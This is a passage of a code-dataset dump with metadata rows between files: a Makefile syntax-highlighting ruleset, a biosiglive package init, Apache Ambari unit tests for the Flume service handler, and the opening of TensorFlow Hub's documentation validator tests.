"L": [makefile_rule8,],
"M": [makefile_rule8,],
"N": [makefile_rule8,],
"O": [makefile_rule8,],
"P": [makefile_rule8,],
"Q": [makefile_rule8,],
"R": [makefile_rule8,],
"S": [makefile_rule8,],
"T": [makefile_rule8,],
"U": [makefile_rule8,],
"V": [makefile_rule8,],
"W": [makefile_rule8,],
"X": [makefile_rule8,],
"Y": [makefile_rule8,],
"Z": [makefile_rule8,],
"`": [makefile_rule6,],
"a": [makefile_rule8,],
"b": [makefile_rule8,],
"c": [makefile_rule8,],
"d": [makefile_rule8,],
"e": [makefile_rule8,],
"f": [makefile_rule8,],
"g": [makefile_rule8,],
"h": [makefile_rule8,],
"i": [makefile_rule8,],
"j": [makefile_rule8,],
"k": [makefile_rule8,],
"l": [makefile_rule8,],
"m": [makefile_rule8,],
"n": [makefile_rule8,],
"o": [makefile_rule8,],
"p": [makefile_rule8,],
"q": [makefile_rule8,],
"r": [makefile_rule8,],
"s": [makefile_rule8,],
"t": [makefile_rule8,],
"u": [makefile_rule8,],
"v": [makefile_rule8,],
"w": [makefile_rule8,],
"x": [makefile_rule8,],
"y": [makefile_rule8,],
"z": [makefile_rule8,],
}
# Rules for makefile_variable ruleset.
def makefile_rule9(colorer, s, i):
return colorer.match_eol_span(s, i, kind="comment1", seq="#",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="", exclude_match=False)
def makefile_rule10(colorer, s, i):
return colorer.match_span(s, i, kind="keyword2", begin="$(", end=")",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="makefile::variable",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def makefile_rule11(colorer, s, i):
return colorer.match_span(s, i, kind="keyword2", begin="${", end="}",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="makefile::variable",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
# Rules dict for makefile_variable ruleset.
rulesDict2 = {
"#": [makefile_rule9,],
"$": [makefile_rule10,makefile_rule11,],
}
# x.rulesDictDict for makefile mode.
rulesDictDict = {
"makefile_main": rulesDict1,
"makefile_variable": rulesDict2,
}
# Import dict for makefile mode.
importDict = {}
| 33.062222 | 96 | 0.631671 |
3955122092b4512cdfa321095167ee5998bf67a7 | 152 | py | Python | biosiglive/__init__.py | Fiverdug/biosiglive | 72c3c2873fa483aeb4c782cfb1c7e4c339e2ee82 | ["MIT"] | null | null | null | biosiglive/__init__.py | Fiverdug/biosiglive | 72c3c2873fa483aeb4c782cfb1c7e4c339e2ee82 | ["MIT"] | null | null | null | biosiglive/__init__.py | Fiverdug/biosiglive | 72c3c2873fa483aeb4c782cfb1c7e4c339e2ee82 | ["MIT"] | null | null | null |
from . import client
from . import data_plot
from . import data_processing
from . import live_data_pytrigno
from . import live_mvc
from . import server
| 21.714286 | 32 | 0.802632 |
4cf43c134cd4576ec677dbe72e9a1597f8853db4 | 25,049 | py | Python | ambari-server/src/test/python/stacks/2.0.6/FLUME/test_flume.py | hmcl/ambari-apache | 87423d64f54d896c62d1a9245eb03a97763e35a4 | ["Apache-2.0"] | 3 | 2019-06-20T11:49:36.000Z | 2020-12-11T10:44:29.000Z | ambari-server/src/test/python/stacks/2.0.6/FLUME/test_flume.py | cas-packone/ambari-chs | 68033fbd4b810b6642853f2ad9128cbbd4e0cb7b | ["Apache-2.0"] | null | null | null | ambari-server/src/test/python/stacks/2.0.6/FLUME/test_flume.py | cas-packone/ambari-chs | 68033fbd4b810b6642853f2ad9128cbbd4e0cb7b | ["Apache-2.0"] | 1 | 2019-03-20T08:36:17.000Z | 2019-03-20T08:36:17.000Z |
#!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from mock.mock import MagicMock, call, patch
from stacks.utils.RMFTestCase import *
import resource_management.core.source
import os
class TestFlumeHandler(RMFTestCase):
COMMON_SERVICES_PACKAGE_DIR = "FLUME/1.4.0.2.0/package"
STACK_VERSION = "2.0.6"
def test_configure_default(self):
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "configure",
config_file="default.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
self.assert_configure_default()
self.assertNoMoreResources()
@patch("os.path.isfile")
@patch("flume.cmd_target_names")
@patch("flume._set_desired_state")
def test_start_default(self, set_desired_mock, cmd_target_names_mock, os_path_isfile_mock):
# 1st call is to check if the conf file is there - that should be True
# 2nd call is to check if the process is live - that should be False
os_path_isfile_mock.side_effect = [True, False]
cmd_target_names_mock.return_value = ["a1"]
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "start",
config_file="default.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
self.assert_configure_default()
self.assertTrue(set_desired_mock.called)
self.assertTrue(set_desired_mock.call_args[0][0] == 'STARTED')
self.assertResourceCalled('Execute', "ambari-sudo.sh su flume -l -s /bin/bash -c 'export PATH=/bin JAVA_HOME=/usr/jdk64/jdk1.7.0_45 ; /usr/bin/flume-ng agent --name a1 --conf /etc/flume/conf/a1 --conf-file /etc/flume/conf/a1/flume.conf -Dflume.monitoring.type=org.apache.hadoop.metrics2.sink.flume.FlumeTimelineMetricsSink -Dflume.monitoring.node=c6402.ambari.apache.org:6189 > /var/log/flume/a1.out 2>&1' &",
environment = {'JAVA_HOME': u'/usr/jdk64/jdk1.7.0_45'},
wait_for_finish = False,
)
self.assertResourceCalled('Execute', "ambari-sudo.sh [RMF_ENV_PLACEHOLDER] -H -E pgrep -o -u flume -f '^/usr/jdk64/jdk1.7.0_45.*a1.*' | ambari-sudo.sh [RMF_ENV_PLACEHOLDER] -H -E tee /var/run/flume/a1.pid && test ${PIPESTATUS[0]} -eq 0",
logoutput = True,
tries = 20,
try_sleep = 10,
)
self.assertNoMoreResources()
@patch("os.path.isfile")
@patch("flume.cmd_target_names")
@patch("flume._set_desired_state")
def test_start_flume_only(self, set_desired_mock, cmd_target_names_mock, os_path_isfile_mock):
# 1st call is to check if the conf file is there - that should be True
# 2nd call is to check if the process is live - that should be False
os_path_isfile_mock.side_effect = [True, False]
cmd_target_names_mock.return_value = ["a1"]
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "start",
config_file="flume_only.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
self.assert_configure_default(check_mc=False)
self.assertTrue(set_desired_mock.called)
self.assertTrue(set_desired_mock.call_args[0][0] == 'STARTED')
self.assertResourceCalled('Execute', "ambari-sudo.sh su flume -l -s /bin/bash -c 'export PATH=/bin JAVA_HOME=/usr/jdk64/jdk1.7.0_45 ; /usr/bin/flume-ng agent --name a1 --conf /etc/flume/conf/a1 --conf-file /etc/flume/conf/a1/flume.conf > /var/log/flume/a1.out 2>&1' &",
environment = {'JAVA_HOME': u'/usr/jdk64/jdk1.7.0_45'},
wait_for_finish = False,
)
self.assertResourceCalled('Execute', "ambari-sudo.sh [RMF_ENV_PLACEHOLDER] -H -E pgrep -o -u flume -f '^/usr/jdk64/jdk1.7.0_45.*a1.*' | ambari-sudo.sh [RMF_ENV_PLACEHOLDER] -H -E tee /var/run/flume/a1.pid && test ${PIPESTATUS[0]} -eq 0",
logoutput = True,
tries = 20,
try_sleep = 10,
)
self.assertNoMoreResources()
@patch("glob.glob")
@patch("flume._set_desired_state")
@patch("flume.await_flume_process_termination")
def test_stop_default(self, await_flume_process_termination_mock, set_desired_mock, glob_mock):
glob_mock.side_effect = [['/var/run/flume/a1/pid'], ['/etc/flume/conf/a1/ambari-meta.json']]
await_flume_process_termination_mock.return_value = True
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "stop",
config_file="default.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
self.assertTrue(glob_mock.called)
await_flume_process_termination_mock.assert_called_with('/var/run/flume/a1.pid')
self.assertTrue(set_desired_mock.called)
self.assertTrue(set_desired_mock.call_args[0][0] == 'INSTALLED')
self.assertResourceCalled('File', '/var/run/flume/a1.pid', action = ['delete'])
self.assertNoMoreResources()
@patch("resource_management.libraries.script.Script.put_structured_out")
@patch("sys.exit")
def test_status_default(self, sys_exit_mock, structured_out_mock):
try:
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "status",
config_file="default.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
except:
# expected since ComponentIsNotRunning gets raised
pass
# test that the method was called with empty processes
self.assertTrue(structured_out_mock.called)
structured_out_mock.assert_called_with({'processes': []})
self.assertNoMoreResources()
def test_struct_out(self):
from resource_management.libraries.script import Script
configs_path = os.path.join(RMFTestCase.get_src_folder(),
"test/python/stacks", self.STACK_VERSION, "configs")
script = Script()
script.stroutfile = os.path.join(configs_path, "structured-out-status.json")
script.load_structured_out()
self.assertFalse("version" in script.structuredOut)
def test_bad_struct_out(self):
from resource_management.libraries.script import Script
from resource_management.core.logger import Logger
configs_path = os.path.join(RMFTestCase.get_src_folder(),
"test/python/stacks", self.STACK_VERSION, "configs")
Logger.initialize_logger()
script = Script()
script.stroutfile = os.path.join(configs_path, "structured-out-status-bad.json")
script.load_structured_out()
self.assertTrue(script.structuredOut == {})
@patch("resource_management.libraries.script.Script.put_structured_out")
@patch("glob.glob")
@patch("sys.exit")
def test_status_with_result(self, sys_exit_mock, glob_mock, structured_out_mock):
glob_mock.return_value = ['/etc/flume/conf/a1/ambari-meta.json']
try:
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "status",
config_file="default.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
except:
# expected since ComponentIsNotRunning gets raised
pass
self.assertTrue(structured_out_mock.called)
# call_args[0] is a tuple, whose first element is the actual call argument
struct_out = structured_out_mock.call_args[0][0]
    self.assertTrue('processes' in struct_out)
self.assertNoMoreResources()
@patch("resource_management.libraries.script.Script.put_structured_out")
@patch("glob.glob")
@patch("sys.exit")
def test_status_no_agents(self, sys_exit_mock, glob_mock, structured_out_mock):
glob_mock.return_value = []
try:
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "status",
config_file="default.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
except:
# expected since ComponentIsNotRunning gets raised
pass
self.assertTrue(structured_out_mock.called)
# call_args[0] is a tuple, whose first element is the actual call argument
struct_out = structured_out_mock.call_args[0][0]
    self.assertTrue('processes' in struct_out)
self.assertNoMoreResources()
def assert_configure_default(self, check_mc=True):
self.assertResourceCalled('Directory', '/var/run/flume',
owner = 'flume',
group = 'hadoop')
self.assertResourceCalled('Directory',
'/etc/flume/conf',
owner='flume',
create_parents = True)
self.assertResourceCalled('Directory',
'/var/log/flume',
owner = 'flume',
group = 'hadoop',
create_parents = True,
cd_access = 'a',
mode=0755
)
self.assertResourceCalled('Directory',
'/etc/flume/conf/a1',
owner='flume')
self.assertResourceCalled('PropertiesFile',
'/etc/flume/conf/a1/flume.conf',
owner='flume',
mode = 0644,
properties = build_flume(
self.getConfig()['configurations']['flume-conf']['content'])['a1'])
self.assertResourceCalled('File',
'/etc/flume/conf/a1/log4j.properties',
content = Template('log4j.properties.j2', agent_name = 'a1'),
owner='flume',
mode = 0644)
self.assertResourceCalled('File',
'/etc/flume/conf/a1/ambari-meta.json',
owner='flume',
content='{"channels_count": 1, "sinks_count": 1, "sources_count": 1}',
mode = 0644)
self.assertResourceCalled('File', "/etc/flume/conf/a1/flume-env.sh",
owner="flume",
content=InlineTemplate(self.getConfig()['configurations']['flume-env']['content'])
)
if check_mc:
self.assertResourceCalled('File', "/etc/flume/conf/a1/flume-metrics2.properties",
owner="flume",
content=Template("flume-metrics2.properties.j2")
)
def assert_configure_many(self):
self.assertResourceCalled('Directory',
'/var/run/flume',
owner='flume',
group = 'hadoop'
)
self.assertResourceCalled('Directory',
'/etc/flume/conf',
owner='flume',
create_parents = True)
self.assertResourceCalled('Directory',
'/var/log/flume',
owner = 'flume',
group = 'hadoop',
create_parents = True,
cd_access = 'a',
mode=0755)
top = build_flume(self.getConfig()['configurations']['flume-conf']['content'])
# a1
self.assertResourceCalled('Directory',
'/etc/flume/conf/a1',
owner='flume')
self.assertResourceCalled('PropertiesFile',
'/etc/flume/conf/a1/flume.conf',
owner='flume',
mode = 0644,
properties = top['a1'])
self.assertResourceCalled('File',
'/etc/flume/conf/a1/log4j.properties',
owner='flume',
content = Template('log4j.properties.j2', agent_name = 'a1'),
mode = 0644)
self.assertResourceCalled('File',
'/etc/flume/conf/a1/ambari-meta.json',
owner='flume',
content='{"channels_count": 1, "sinks_count": 1, "sources_count": 1}',
mode = 0644)
self.assertResourceCalled('File', "/etc/flume/conf/a1/flume-env.sh",
owner="flume",
content=InlineTemplate(self.getConfig()['configurations']['flume-env']['content'])
)
# b1
self.assertResourceCalled('Directory',
'/etc/flume/conf/b1',
owner='flume')
self.assertResourceCalled('PropertiesFile', '/etc/flume/conf/b1/flume.conf',
mode = 0644,
owner='flume',
properties = top['b1'])
self.assertResourceCalled('File',
'/etc/flume/conf/b1/log4j.properties',
owner='flume',
content = Template('log4j.properties.j2', agent_name = 'b1'),
mode = 0644)
self.assertResourceCalled('File',
'/etc/flume/conf/b1/ambari-meta.json',
owner='flume',
content='{"channels_count": 1, "sinks_count": 1, "sources_count": 1}',
mode = 0644)
self.assertResourceCalled('File', "/etc/flume/conf/b1/flume-env.sh",
owner="flume",
content=InlineTemplate(self.getConfig()['configurations']['flume-env']['content'])
)
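  # NOTE: test_start_single is defined twice in this class; this first definition is
  # shadowed by the later one (which asserts the ambari-sudo.sh based commands), so
  # only the second version actually runs under unittest.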
@patch("os.path.isfile")
def test_start_single(self, os_path_isfile_mock):
# 1st call is to check if the conf file is there - that should be True
# 2nd call is to check if the process is live - that should be False
os_path_isfile_mock.side_effect = [True, False]
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "start",
config_file="flume_target.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
self.assert_configure_many()
self.assertResourceCalled('Execute', format('su -s /bin/bash flume -c "export JAVA_HOME=/usr/jdk64/jdk1.7.0_45; /usr/bin/flume-ng agent '
'--name b1 '
'--conf /etc/flume/conf/b1 '
'--conf-file /etc/flume/conf/b1/flume.conf '
'-Dflume.monitoring.type=ganglia '
'-Dflume.monitoring.hosts=c6401.ambari.apache.org:8655"'),
wait_for_finish = False)
self.assertResourceCalled('Execute', 'pgrep -o -u flume -f ^/usr/jdk64/jdk1.7.0_45.*b1.* > /var/run/flume/b1.pid',
logoutput = True,
tries = 10,
try_sleep = 6)
self.assertNoMoreResources()
@patch("os.path.isfile")
def test_start_single(self, os_path_isfile_mock):
# 1st call is to check if the conf file is there - that should be True
# 2nd call is to check if the process is live - that should be False
os_path_isfile_mock.side_effect = [True, False]
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "start",
config_file="flume_target.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
self.assert_configure_many()
self.assertResourceCalled('Execute', "ambari-sudo.sh su flume -l -s /bin/bash -c 'export PATH=/bin JAVA_HOME=/usr/jdk64/jdk1.7.0_45 ; /usr/bin/flume-ng agent --name b1 --conf /etc/flume/conf/b1 --conf-file /etc/flume/conf/b1/flume.conf -Dflume.monitoring.type=ganglia -Dflume.monitoring.hosts=c6401.ambari.apache.org:8655 > /var/log/flume/b1.out 2>&1' &",
environment = {'JAVA_HOME': u'/usr/jdk64/jdk1.7.0_45'},
wait_for_finish = False,
)
self.assertResourceCalled('Execute', "ambari-sudo.sh [RMF_ENV_PLACEHOLDER] -H -E pgrep -o -u flume -f '^/usr/jdk64/jdk1.7.0_45.*b1.*' | ambari-sudo.sh [RMF_ENV_PLACEHOLDER] -H -E tee /var/run/flume/b1.pid && test ${PIPESTATUS[0]} -eq 0",
logoutput = True,
tries = 20,
try_sleep = 10,
)
self.assertNoMoreResources()
@patch("glob.glob")
@patch("flume.await_flume_process_termination")
def test_stop_single(self, await_flume_process_termination_mock, glob_mock):
glob_mock.return_value = ['/var/run/flume/b1.pid']
await_flume_process_termination_mock.return_value = True
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "stop",
config_file="flume_target.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
self.assertTrue(glob_mock.called)
await_flume_process_termination_mock.assert_called_with('/var/run/flume/b1.pid')
self.assertResourceCalled('File', '/var/run/flume/b1.pid', action = ['delete'])
self.assertNoMoreResources()
@patch("flume.find_expected_agent_names")
def test_configure_with_existing(self, expected_names_mock):
expected_names_mock.return_value = ["x1"]
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "configure",
config_file="default.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
self.assertResourceCalled('File', '/etc/flume/conf/x1/ambari-meta.json',
action = ['delete'],
)
self.assert_configure_default()
self.assertNoMoreResources()
def test_flume_env_not_22(self):
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "configure",
config_file="default.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
self.assertResourceCalled('Directory', '/var/run/flume',
group = 'hadoop',
owner='flume',)
self.assertResourceCalled('Directory',
'/etc/flume/conf',
owner='flume',
create_parents = True)
self.assertResourceCalled('Directory',
'/var/log/flume',
owner = 'flume',
cd_access = 'a',
group = 'hadoop',
create_parents = True,
mode=0755)
self.assertResourceCalled('Directory',
'/etc/flume/conf/a1',
owner='flume')
self.assertResourceCalled('PropertiesFile',
'/etc/flume/conf/a1/flume.conf',
owner='flume',
mode = 0644,
properties = build_flume(
self.getConfig()['configurations']['flume-conf']['content'])['a1'])
self.assertResourceCalled('File',
'/etc/flume/conf/a1/log4j.properties',
owner='flume',
content = Template('log4j.properties.j2', agent_name = 'a1'),
mode = 0644)
self.assertResourceCalled('File',
'/etc/flume/conf/a1/ambari-meta.json',
owner='flume',
content='{"channels_count": 1, "sinks_count": 1, "sources_count": 1}',
mode = 0644)
content = InlineTemplate(self.getConfig()['configurations']['flume-env']['content'])
self.assertTrue(content.get_content().find('/usr/lib/hive') > -1)
self.assertResourceCalled('File', "/etc/flume/conf/a1/flume-env.sh",
owner="flume",
content=content)
def test_flume_env_with_22(self):
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "configure",
config_file="flume_22.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
self.assertResourceCalled('Directory', '/var/run/flume',
group = 'hadoop',
owner='flume')
self.assertResourceCalled('Directory',
'/usr/hdp/current/flume-server/conf',
owner='flume',
create_parents = True)
self.assertResourceCalled('Directory',
'/var/log/flume',
owner = 'flume',
group = 'hadoop',
create_parents = True,
cd_access = 'a',
mode=0755)
self.assertResourceCalled('Directory',
'/usr/hdp/current/flume-server/conf/a1',
owner='flume')
self.assertResourceCalled('PropertiesFile',
'/usr/hdp/current/flume-server/conf/a1/flume.conf',
owner='flume',
mode = 0644,
properties = build_flume(
self.getConfig()['configurations']['flume-conf']['content'])['a1'])
self.assertResourceCalled('File',
'/usr/hdp/current/flume-server/conf/a1/log4j.properties',
content = Template('log4j.properties.j2', agent_name = 'a1'),
owner='flume',
mode = 0644)
self.assertResourceCalled('File',
'/usr/hdp/current/flume-server/conf/a1/ambari-meta.json',
content='{"channels_count": 1, "sinks_count": 1, "sources_count": 1}',
owner='flume',
mode = 0644)
content = InlineTemplate(self.getConfig()['configurations']['flume-env']['content'])
self.assertTrue(content.get_content().find('/usr/hdp/current/hive-metastore') > -1)
self.assertResourceCalled('File',
"/usr/hdp/current/flume-server/conf/a1/flume-env.sh",
owner="flume",
content=content)
def test_pre_upgrade_restart(self):
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "pre_upgrade_restart",
config_file="flume_22.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
self.assertResourceCalled("Execute", ('ambari-python-wrap', '/usr/bin/hdp-select', 'set', 'flume-server', '2.2.1.0-2067'), sudo=True)
def build_flume(content):
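  # Parses flume.conf text into a dict keyed by agent name. Illustrative input only
  # (not taken from a test config): the two lines
  #   a1.sources = r1
  #   a1.sources.r1.type = seq
  # become {'a1': {'a1.sources': 'r1', 'a1.sources.r1.type': 'seq'}}; prefixes that
  # never declare a ".sources" property are dropped below as non-agents.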
result = {}
agent_names = []
for line in content.split('\n'):
rline = line.strip()
if 0 != len(rline) and not rline.startswith('#'):
pair = rline.split('=')
lhs = pair[0].strip()
rhs = pair[1].strip()
part0 = lhs.split('.')[0]
if lhs.endswith(".sources"):
agent_names.append(part0)
      if part0 not in result:
result[part0] = {}
result[part0][lhs] = rhs
# trim out non-agents
  for k in list(result.keys()):
    if k not in agent_names:
      del result[k]
return result
avg_line_length: 41.958124 | max_line_length: 414 | alphanum_fraction: 0.590802

hexsha: 0d0908f4e9c040ec3221f0a55794e2592868cfb1 | size: 12225 | ext: py | lang: Python
max_stars_repo: path=tfhub_dev/tools/validator_test.py | name=tsadr/hub | head_hexsha=5186d911de9bce0adee28993fa396e7392fb1c18 | licenses=["Apache-2.0"] | count=null | stars_event=null..null
max_issues_repo: path=tfhub_dev/tools/validator_test.py | name=tsadr/hub | head_hexsha=5186d911de9bce0adee28993fa396e7392fb1c18 | licenses=["Apache-2.0"] | count=null | issues_event=null..null
max_forks_repo: path=tfhub_dev/tools/validator_test.py | name=tsadr/hub | head_hexsha=5186d911de9bce0adee28993fa396e7392fb1c18 | licenses=["Apache-2.0"] | count=null | forks_event=null..null
# Copyright 2020 The TensorFlow Hub Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow_hub.tfhub_dev.tools.validator."""
import os
import shutil
import tempfile
import tensorflow as tf
from tfhub_dev.tools import validator
class MockFilesystem(validator.Filesystem):
"""Returns a Mock Filesystem storing files in a dictionary."""
def __init__(self):
self._files = dict()
def get_contents(self, filename):
return self._files[filename]
def set_contents(self, filename, contents):
self._files[filename] = contents
def recursive_list_dir(self, root_dir):
return [
f for f in self._files.keys() if f.startswith(root_dir + os.path.sep)
]
MINIMAL_MARKDOWN_TEMPLATE = """# Module google/text-embedding-model/1
Simple description spanning
multiple lines.
<!-- asset-path: %s -->
<!-- module-type: text-embedding -->
<!-- fine-tunable: true -->
<!-- format: saved_model_2 -->
## Overview
"""
MINIMAL_MARKDOWN_WITH_ALLOWED_LICENSE = """# Module google/model/1
Simple description.
<!-- asset-path: %s -->
<!-- module-type: text-embedding -->
<!-- fine-tunable: true -->
<!-- format: saved_model_2 -->
<!-- license: BSD-3-Clause -->
## Overview
"""
MINIMAL_MARKDOWN_WITH_UNKNOWN_LICENSE = """# Module google/model/1
Simple description.
<!-- asset-path: %s -->
<!-- module-type: text-embedding -->
<!-- fine-tunable: true -->
<!-- format: saved_model_2 -->
<!-- license: my_license -->
## Overview
"""
MARKDOWN_WITHOUT_DESCRIPTION = """# Module google/text-embedding-model/1
<!-- asset-path: https://path/to/text-embedding-model/model.tar.gz -->
<!-- format: saved_model_2 -->
## Overview
"""
MARKDOWN_WITH_MISSING_METADATA = """# Module google/text-embedding-model/1
One line description.
<!-- asset-path: https://path/to/text-embedding-model/model.tar.gz -->
<!-- format: saved_model_2 -->
## Overview
"""
MARKDOWN_WITH_DUPLICATE_METADATA = """# Module google/text-embedding-model/1
One line description.
<!-- asset-path: https://path/to/text-embedding-model/model.tar.gz -->
<!-- asset-path: https://path/to/text-embedding-model/model2.tar.gz -->
<!-- module-type: text-embedding -->
<!-- fine-tunable: true -->
<!-- format: saved_model_2 -->
## Overview
"""
MARKDOWN_WITH_UNEXPECTED_LINES = """# Module google/text-embedding-model/1
One line description.
<!-- module-type: text-embedding -->
This should not be here.
<!-- format: saved_model_2 -->
## Overview
"""
MINIMAL_COLLECTION_MARKDOWN = """# Collection google/text-embedding-collection/1
Simple description spanning
multiple lines.
<!-- module-type: text-embedding -->
## Overview
"""
MINIMAL_PUBLISHER_MARKDOWN = """# Publisher some-publisher
Simple description spanning one line.
[![Icon URL]](https://path/to/icon.png)
## Overview
"""
class ValidatorTest(tf.test.TestCase):
def setUp(self):
super(tf.test.TestCase, self).setUp()
self.tmp_dir = tempfile.mkdtemp()
self.model_path = os.path.join(self.tmp_dir, "model_1")
self.not_a_model_path = os.path.join(self.tmp_dir, "not_a_model")
self.save_dummy_model(self.model_path)
self.minimal_markdown = MINIMAL_MARKDOWN_TEMPLATE % self.model_path
self.minimal_markdown_with_bad_model = (
MINIMAL_MARKDOWN_TEMPLATE % self.not_a_model_path)
def tearDown(self):
super(tf.test.TestCase, self).tearDown()
shutil.rmtree(self.tmp_dir)
def save_dummy_model(self, path):
class MultiplyTimesTwoModel(tf.train.Checkpoint):
"""Callable model that multiplies by two."""
@tf.function(
input_signature=[tf.TensorSpec(shape=None, dtype=tf.float32)])
def __call__(self, x):
return x * 2
model = MultiplyTimesTwoModel()
tf.saved_model.save(model, path)
def test_filesystem(self):
tmp_dir = self.get_temp_dir()
tmp_file_path = tempfile.mktemp(dir=tmp_dir)
file_contents = "CONTENTS"
with tf.io.gfile.GFile(tmp_file_path, "w") as output_file:
output_file.write(file_contents)
filesystem = validator.Filesystem()
self.assertEqual(file_contents, filesystem.get_contents(tmp_file_path))
self.assertAllEqual([tmp_file_path],
list(filesystem.recursive_list_dir(tmp_dir)))
def test_minimal_markdown_parsed(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/google/models/text-embedding-model/1.md",
self.minimal_markdown)
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_minimal_markdown_parsed_with_selected_files(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/google/models/text-embedding-model/1.md",
self.minimal_markdown)
num_validated = validator.validate_documentation_files(
documentation_dir="root",
files_to_validate=["google/models/text-embedding-model/1.md"],
filesystem=filesystem)
self.assertEqual(1, num_validated)
def test_minimal_collection_markdown_parsed(self):
filesystem = MockFilesystem()
filesystem.set_contents(
"root/google/collections/text-embedding-collection/1.md",
MINIMAL_COLLECTION_MARKDOWN)
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_minimal_publisher_markdown_parsed(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/some-publisher/some-publisher.md",
MINIMAL_PUBLISHER_MARKDOWN)
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_invalid_markdown_fails(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/publisher/model/1.md", "INVALID MARKDOWN")
with self.assertRaisesRegexp(validator.MarkdownDocumentationError,
".*First line.*"):
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_minimal_markdown_not_in_publisher_dir(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/gooogle/models/wrong-location/1.md",
self.minimal_markdown)
with self.assertRaisesRegexp(validator.MarkdownDocumentationError,
".*placed in the publisher directory.*"):
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_minimal_markdown_does_not_end_with_md_fails(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/google/models/wrong-extension/1.mdz",
self.minimal_markdown)
with self.assertRaisesRegexp(validator.MarkdownDocumentationError,
r".*end with \"\.md.\"*"):
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_publisher_markdown_at_incorrect_location_fails(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/google/publisher.md",
MINIMAL_PUBLISHER_MARKDOWN)
with self.assertRaisesRegexp(validator.MarkdownDocumentationError,
r".*some-publisher\.md.*"):
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_publisher_markdown_at_correct_location(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/some-publisher/some-publisher.md",
MINIMAL_PUBLISHER_MARKDOWN)
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_markdown_without_description(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/google/models/text-embedding-model/1.md",
